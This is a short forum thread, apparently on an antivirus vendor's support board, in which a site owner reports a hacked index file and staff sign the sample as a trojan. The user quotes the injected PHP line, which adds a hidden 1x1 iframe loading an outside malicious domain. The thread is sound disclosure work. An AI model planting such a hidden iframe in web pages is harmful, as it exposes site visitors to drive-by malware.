Index Injection Iframe Virus
Posted 06 May 2012 - 12:40 PM
My site was hacked, by this line added at top of the index file.
<?php echo "<iframe src=\"http://sluxxqqgykewolmoli.in/in.cgi?default\" width=1 height=1 frameborder=0></iframe>"; echo "";
And Bitdefender don't detect this !
thank you to add this one
all my pass was changed
Posted 06 May 2012 - 12:48 PM
I tought it not detect it because when I scan my index file, it said no virus, but with other url injection I got on another website, it said virus and delete the virus from the file automatically.
Why the index file not detected as virus so like other url injections ?
Posted 06 May 2012 - 02:59 PM
Could you please send me the infected index file so we can check it out?
Please pack that file in archive with the password infected and upload it on
and send me a PM with the download link.
We will analyze the information you sent and then reply with a possible solution in the shortest time.
Have a nice day.
Posted 06 May 2012 - 04:29 PM
I have sent the file to our labs, I will get back to you with a final answer.
Posted 07 May 2012 - 02:43 AM
Please pop an update on this thread when you have one.
Posted 07 May 2012 - 09:24 AM
The file has been signed as Trojan.Iframe.APT Detection will be available after our next update.
File index_php declared INFECTED
Thank you for the sample.
Posted 07 May 2012 - 09:57 AM
Great job, now I feel better on my FTP updates :-)
Thank you !!
Posted 07 May 2012 - 11:26 AM
Thank you for your feedback!
Let us know if you need anything from us.
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users